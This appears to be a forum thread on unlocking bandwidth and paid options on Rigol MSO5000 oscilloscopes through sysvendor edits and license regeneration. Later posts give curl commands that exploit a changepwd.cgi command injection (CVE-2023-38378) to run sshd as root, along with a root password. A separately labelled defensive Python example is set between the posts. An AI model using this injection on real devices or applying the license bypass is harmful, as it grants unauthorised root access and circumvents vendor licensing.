Author Topic: Hacking the Rigol MSO5000 series oscilloscopes  (Read 1543104 times)

Offline J-R

  • Super Contributor
  • ***
  • Posts: 1619
  • Country: us
Re: Hacking the Rigol MSO5000 series oscilloscopes
« Reply #3225 on: August 26, 2025, 05:52:09 pm »
My understanding is that there are two methods to unlocking the scope, the one in this thread and the new one in the other thread.  If you already went through the process using the new method, changing the model number is pretty straightforward since you'll already be familiar with much of the process.  If not, then I think you'll want to read BTO's documentation to fill in some of the gaps.
 

Offline Elektro

  • Newbie
  • Posts: 6
  • Country: de
Re: Hacking the Rigol MSO5000 series oscilloscopes
« Reply #3226 on: August 28, 2025, 11:31:51 am »
@J-R: Yes I have used the new method to update the scope to 350MHz.

With a few changes to the original instructions (Reply #2981), I was able to switch the oscilloscope from 350 MHz to 500MHz and reactivate all options.

Without the extension “--model <your_desired_model>”, the Python script will terminate with an error message, as shown in “Reply #3220” (except in step 5).
The problem appears to be independent of the Python version (tested with Python 3.13.7 and 3.10.11).
For Step 5 the python script "Rigol_MSO_LicensingUtility_2.10b.py" was used.

Code: [Select]
#1 -> save current sysvendor
python rigol_mso_util_2.13b.py --save-sysvendor <rigol_ip_address> --model <your_desired_model>

Code: [Select]
#2 -> find the device xxtea key
python rigol_mso_util_2.13b.py --sysvendor-key <rigol_ip_address> --model <your_desired_model>

On the screen: DEVICE XXTEA KEY [COPY WHAT IS BETWEEN THE SQUARE BRACKETS]

Code: [Select]
#3 -> change sysvendor model in sysvendor file (can also be used on --mac and --serial)
python rigol_mso_util_2.13b.py --offline --sysvendor-file <file_saved_at_step_1> --use-sysvendor-key <only_the_key_from_step_2> --model <your_desired_model>

Code: [Select]
#4 -> write modified sysvendor to device
python rigol_mso_util_2.13b.py --write-sysvendor --write-sysvendor-file <file_from_step_3> <rigol_ip_address> --model <your_desired_model>

From this point on, the oscilloscope runs at 500 MHz, but without options.

Step 5 with “rigol_mso_util_2.13b.py” with and without the extension “--model <your_desired_model>” does not work.

Reboot the device two times.
Set it to default

Code: [Select]
#5 -> reactivate licenses
python Rigol_MSO_LicensingUtility_2.10b.py --regen <rigol_ip_address>

All options are activated.
The oscilloscope with options seems to be functioning properly.

Hint:
Be careful.
I couldn't find any instructions on how to reinstall the backup files on the scope (means NAND, dump, ...)
(and no command instructions in the Python script either).

« Last Edit: August 28, 2025, 12:16:53 pm by Elektro »
 
The following users thanked this post: mwb1100, w.v.s.

Offline Retired2

  • Contributor
  • Posts: 21
  • Country: us
Re: Hacking the Rigol MSO5000 series oscilloscopes
« Reply #3227 on: August 28, 2025, 06:42:46 pm »
MSO5354 Attempt to Change Model Failed with additional Issues

After trying to apply 5504 to this model:
As of today 08-11-2025
-= NEW sysvendor.bin =-
sysvendor.bin data:
  size=248 ok! | crc32=60C0FE53 [1623260755] ok!

╒════════════╤═════════════════╤══════════════╤═════════════╤══════════════════╤════════════════════════╕
│   key_size │ key_data        │   value_size │ value_crc   │   value_str_size │ value_decrypted_data   │
╞════════════╪═════════════════╪══════════════╪═════════════╪══════════════════╪════════════════════════╡
│         15 │ E_CFG_MODEL_RAW │           56 │ 4B9626E7    │                4 │5504                │
├────────────┼─────────────────┼──────────────┼─────────────┼──────────────────┼────────────────────────┤
│         12 │ E_CFG_SN_RAW    │           52 │ E59DF54E    │               13 │           │
├────────────┼─────────────────┼──────────────┼─────────────┼──────────────────┼────────────────────────┤
│          9 │ E_CFG_MAC       │           56 │ 2AD8E37E    │               17 │      │
╘════════════╧═════════════════╧══════════════╧═════════════╧══════════════════╧════════════════════════╛
Saved sysvendor.bin_mod to 'rigol_sysvendor.bin_mod_17549309591026.data'
sysvendor file has been modified!
PS C:\Users\pspan\MSODump> python rigol_mso_util_2.13b.py --write-sysvendor --write-sysvendor-file rigol_sysvendor.bin_mod_17549309591026.data 192.168.1.4
╒═════════╤═══════════════╤════════════════╤═══════════════════╤═════════════╕
│ Model   │ Serial        │ Version        │ MAC               │ Lic Model   │
╞═════════╪═══════════════╪════════════════╪═══════════════════╪═════════════╡
│ MSO5354 │ │ 00.01.03.03.00 │ │ MSO5000     │
╘═════════╧═══════════════╧════════════════╧═══════════════════╧═════════════╛
╒════════╤══════════╤═════════════════════════════════════════════════════╕
│ Code   │ Status   │ Description                                         │
╞════════╪══════════╪═════════════════════════════════════════════════════╡
│ 2RL    │ Forever  │ 200Mpts Deep Memory Option                          │
├────────┼──────────┼─────────────────────────────────────────────────────┤
│ COMP   │ Forever  │ Computer Serial Triggering and Analysis(RS232/UART) │
├────────┼──────────┼─────────────────────────────────────────────────────┤
│ EMBD   │ Forever  │ Embedded Serial Triggering and Analysis(IIC, SPI)   │
├────────┼──────────┼─────────────────────────────────────────────────────┤
│ AUTO   │ Forever  │ Automotive Serial Triggering and Analysis(CAN/LIN)  │
├────────┼──────────┼─────────────────────────────────────────────────────┤
│ FLEX   │ Forever  │ FlexRay Serial Triggering and Analysis              │
├────────┼──────────┼─────────────────────────────────────────────────────┤
│ AUDIO  │ Forever  │ Audio Serial Triggering and Analysis(I2S)           │
├────────┼──────────┼─────────────────────────────────────────────────────┤
│ AERO   │ Forever  │ MIL-STD 1553 Serial Triggering and Analysis         │
├────────┼──────────┼─────────────────────────────────────────────────────┤
│ DG     │ Forever  │ Dual Channel WaveGen 25 MHz AWG                     │
├────────┼──────────┼─────────────────────────────────────────────────────┤
│ PWR    │ Forever  │ Integrated Power Analysis                           │
╘════════╧══════════╧═════════════════════════════════════════════════════╛
checking /rigol/tools/fram ...done!
Reading FRAM data ...done!
Patching FRAM binary....done!
Rebooting device...Waiting for device to be back online................................................................done
OK then after reboot I got:
PS C:\Users\pspan\MSODump> python rigol_mso_util_2.13b.py --regen 192.168.1.4

Traceback (most recent call last):
  File "C:\Users\pspan\MSODump\rigol_mso_util_2.13b.py", line 1052, in <module>
    main()
    ~~~~^^
  File "C:\Users\pspan\MSODump\rigol_mso_util_2.13b.py", line 881, in main
    k_model = helpers.model_to_license_str(model)
  File "C:\Users\pspan\MSODump\rigol_mso_util_2.13b.py", line 128, in model_to_license_str
    m = re.match(r'([A-Za-z]+)(\d+)([A-Za-z]*)$', model)
  File "C:\Users\pspan\AppData\Local\Programs\Python\Python313\Lib\re\__init__.py", line 167, in match
    return _compile(pattern, flags).match(string)
           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^
TypeError: expected string or bytes-like object, got 'NoneType'

NOW
I have issues: NO Model shown in Web Control screen, Cannot login to Web Control with default Login / password but can use VNC viewer. I cannot enable SSH either. Bandwidth is still 350 MHz.
It appears all other scope functions work.

How can this be fixed?
Thank you for reading this and in advance for your help.
 

Offline Elektro

  • Newbie
  • Posts: 6
  • Country: de
Re: Hacking the Rigol MSO5000 series oscilloscopes
« Reply #3228 on: August 29, 2025, 11:13:18 am »
@Retired2:

Did you use my additional instructions from Reply #3226 or the original instructions from Reply #2981 by user "BTO"?
Because it seems you don't use the extension “--model <your_desired_model>”.

If you have followed my additional instructions in Reply #3226,
please read ALL the instructions I wrote in  Reply #3226!

I wrote:
   "For Step 5 the python script "Rigol_MSO_LicensingUtility_2.10b.py" was used."
and
   "Step 5 with “rigol_mso_util_2.13b.py” with and without the extension “--model <your_desired_model>” does not work."

"
   Reboot the device two times.
   Set it to default

"

Check the IP address. After restarting, the device may be assigned a new IP address.

"
   #5 -> reactivate licenses
   python Rigol_MSO_LicensingUtility_2.10b.py --regen <rigol_ip_address>


   All options are activated.
   The oscilloscope with options seems to be functioning properly.
   
   Hint:
   Be careful.
   I couldn't find any instructions on how to reinstall the backup files on the scope (means NAND, dump, ...)
   (and no command instructions in the Python script either).

"

(That was my process!)

For Step 5 you used "rigol_mso_util_2.13b.py"!
I also received error messages with the version “rigol_mso_util_2.13b.py”.
However, my oscilloscope was already at 500 MHz from step 4 onwards, but without any options.
I therefore suspect that the error lies further up.
I don't know why your oscilloscope is still set to 350MHz.

Quote
I have issues: NO Model shown in Web Control screen, Cannot login to Web Control with default Login / password but can use VNC viewer.
I think this topic is described in this chat.
I also think that there is no solution for it.
« Last Edit: August 29, 2025, 02:11:09 pm by Elektro »
 

Offline Fluffhamster

  • Newbie
  • Posts: 4
  • Country: aq
Re: Hacking the Rigol MSO5000 series oscilloscopes
« Reply #3229 on: November 02, 2025, 07:10:58 pm »
I had eye and jitter options activated in the menu before. Is there a way to reactivate them? (not that eye option was working but jitter worked)
 

Offline sorenkir

  • Regular Contributor
  • *
  • Posts: 157
  • Country: fr
Re: Hacking the Rigol MSO5000 series oscilloscopes
« Reply #3230 on: November 03, 2025, 08:40:14 am »
Quote
I had eye and jitter options activated in the menu before. Is there a way to reactivate them? (not that eye option was working but jitter worked)

Hi,

I have reapplied the "patch method" to my version v00.01.03.03.00 ( https://www.eevblog.com/forum/testgear/hacking-the-rigol-mso5000-series-oscilloscopes/msg4856702/#msg4856702 ) and jitter & eye options have reappeared!

Michel.
 
The following users thanked this post: Fluffhamster

Offline monz

  • Contributor
  • Posts: 21
Re: Hacking the Rigol MSO5000 series oscilloscopes
« Reply #3231 on: November 11, 2025, 12:48:01 am »
Hello, thanks for the guide. However, I'm running into some trouble. I successfully converted a MSO5104 to a MSO5354.

I cannot complete the last step to activate options.

I've tried this under 3.10.x, 3.12.x and 3.14.x versions of Python from Windows and 3.12.x from a machine running Linux. Modules it needs installed via pip.

I get the following error:


python.exe" Rigol_MSO_LicensingUtility_2.10b.py --regen 192.168.216.159 --model MSO5354

(Summary table of options/info is displayed here)

Traceback (most recent call last):
  File Rigol_MSO_LicensingUtility_2.10b.py, line 740, in <module>
    main()
  File Rigol_MSO_LicensingUtility_2.10b.py", line 681, in main
    opt_sign, key_hex, prev_key = sign_option({
  File Rigol_MSO_LicensingUtility_2.10b.py", line 81, in sign_option
    bb.extend(opt['model'].encode())
AttributeError: 'NoneType' object has no attribute 'encode'







 

Offline monz

  • Contributor
  • Posts: 21
Re: Hacking the Rigol MSO5000 series oscilloscopes
« Reply #3232 on: November 11, 2025, 05:04:56 am »
I managed to get this working by hard coding some variables in the script.

I changed:
    model = m.group(1).decode()
    ser = m.group(2).decode()
    ver = m.group(3).decode()
    mac = m.group(4).decode()


To
    model = "MSO5354"
    ser = "MS51234xyz"
    ver = "00.01.03.03.00"
    mac = "00-19-AF-AA-BB-CC"

The values for model, ser, ver, and mac were found by going to:
http://scope-ip/cgi-bin/welcome.cgi

For some reason the script isn't parsing this info.
SERIAL_PAT's regex probably just needs to be fixed, not sure how to fix that so I just hard coded it for mine to get it to run.


 
The following users thanked this post: thm_w, mwb1100

Offline jhobbyist

  • Newbie
  • Posts: 3
  • Country: us
Re: Hacking the Rigol MSO5000 series oscilloscopes
« Reply #3233 on: November 28, 2025, 03:50:02 pm »
Web Control is broken after using the changepwd exploit, which the Python utility uses. You can restore it with a simple curl command:

Code: [Select]
curl --location 'http://<scope-ip>/cgi-bin/changepwd.cgi' \
    --form 'pass0=""' \
    --form 'pass1="rigol"'

Long story short, the script takes advantage of CVE-2023-38378 to execute arbitrary commands as root, which "corrupts" the password file used by web control. The above curl command restores the password using the same exploit.
 
The following users thanked this post: w.v.s.

Offline jhobbyist

  • Newbie
  • Posts: 3
  • Country: us
Re: Hacking the Rigol MSO5000 series oscilloscopes
« Reply #3234 on: November 28, 2025, 04:45:53 pm »
Quote
NOW
I have issues: NO Model shown in Web Control screen, Cannot login to Web Control with default Login / password but can use VNC viewer. I cannot enable SSH either. Bandwidth is still 350 MHz.
It appears all other scope functions work.

How can this be fixed?
Thank you for reading this, and in advance for your help.

My previous post resolves your Web Control login issue. For SSH, you can either use the Python script or directly invoke sshd using the same exploit. You will need to execute this on every boot to re-enable access, and you will need to restore the Web Control password after each execution. For simplicity, here is a single command that will enable ssh and restore the default Web Control password:

Code: [Select]
curl --location 'http://<scope-ip>/cgi-bin/changepwd.cgi' \
    --form 'pass0=""' \
    --form 'pass1=";/usr/bin/sshd; echo admin:rigol"'


You will now be able to log in as root:
Code: [Select]
ssh root@<scope-ip>
Password: Rigol201

Now that you have SSH access, there are ways to enable SSH at startup. I haven't taken the time to learn the startup process for the Linux implementation on the scope, so I'll leave that for this community.

Note: For those who are curious about the Web Control password, you can SSH in and cat the password file before restoring the password and see that it contains the output from the last command executed.
Code: [Select]
cat /rigol/default/user.conf
« Last Edit: November 28, 2025, 05:11:00 pm by jhobbyist »
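
Added example, not part of jhobbyist's posts and not Rigol's or the utility's code: the two posts above describe a password-change field whose value reaches a root shell, and a password file that ends up holding command output. The Python below shows the corrected pattern for such a handler (the value is validated and written as data, with no shell involved) plus a check that a credential file holds exactly one user:password line. The function names, the allow-list and the one-line file format (inferred from the `echo admin:rigol` in the post) are assumptions of this example.

```python
import os
import re
import tempfile

# Assumption: the file holds exactly one "user:password" line. The allow-list is
# this example's choice; the key property is that no shell ever sees the value.
FIELD = re.compile(r"[A-Za-z0-9_.-]{1,32}")
CRED_LINE = re.compile(r"[A-Za-z0-9_.-]{1,32}:[A-Za-z0-9_.-]{1,32}\n?")


def credential_file_is_sane(text: str) -> bool:
    """True only if the content is one well-formed user:password line."""
    return CRED_LINE.fullmatch(text) is not None


def set_web_password(conf_path: str, user: str, new_password: str) -> None:
    """Store the credential as data: validate first, then replace the file atomically."""
    for name, value in (("user", user), ("password", new_password)):
        if FIELD.fullmatch(value) is None:
            raise ValueError(f"rejected {name}: characters outside the allow-list")
    directory = os.path.dirname(os.path.abspath(conf_path))
    fd, tmp = tempfile.mkstemp(dir=directory)
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write(f"{user}:{new_password}\n")
        os.replace(tmp, conf_path)  # readers never see a half-written file
    except BaseException:
        os.unlink(tmp)
        raise


def demo() -> dict:
    """Run the checks on constructed inputs inside a temporary directory."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "user.conf")
        set_web_password(path, "admin", "rigol")
        with open(path) as fh:
            results["clean_file_ok"] = credential_file_is_sane(fh.read())
        try:
            # pass1 value quoted from the post above; here it is rejected as plain data
            set_web_password(path, "admin", ";/usr/bin/sshd; echo admin:rigol")
            results["metachar_rejected"] = False
        except ValueError:
            results["metachar_rejected"] = True
        with open(path) as fh:
            results["file_unchanged"] = fh.read() == "admin:rigol\n"
    # Constructed sample of a file that holds command output instead of a credential
    sample = "sshd: started\nadmin:rigol\n"
    results["command_output_flagged"] = not credential_file_is_sane(sample)
    return results


if __name__ == "__main__":
    print(demo())
```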
 

Offline rpro

  • Regular Contributor
  • *
  • Posts: 80
  • Country: us
Re: Hacking the Rigol MSO5000 series oscilloscopes
« Reply #3235 on: November 28, 2025, 06:10:59 pm »
If you haven’t tried it yet, VNC is worth a look. The scope has a built-in running VNC server, and you can connect with a viewer like RealVNC with no password needed. You’ll also find it has much less latency than the web-control option.
 
The following users thanked this post: jhobbyist

Offline jhobbyist

  • Newbie
  • Posts: 3
  • Country: us
Re: Hacking the Rigol MSO5000 series oscilloscopes
« Reply #3236 on: November 28, 2025, 07:32:26 pm »
I was using VNC, I just do not like having features that do not work :D. After some digging through this thread, I see this has been addressed by BTO previously in 2.13b; my above responses were based on the 2.10 Python utility. The curl API method I posted still works for starting SSH, but here are the Python commands to start SSH on boot and fix the Web Control password:

Enable SSH on boot:
Code: [Select]
python rigol_mso_util_2.13b.py --ssh --start-sshd-on-boot <scope-ip>
Reset Web Control Password:
Code: [Select]
python rigol_mso_util_2.13b.py --reset-web-pwd <scope-ip>
 
The following users thanked this post: mwb1100

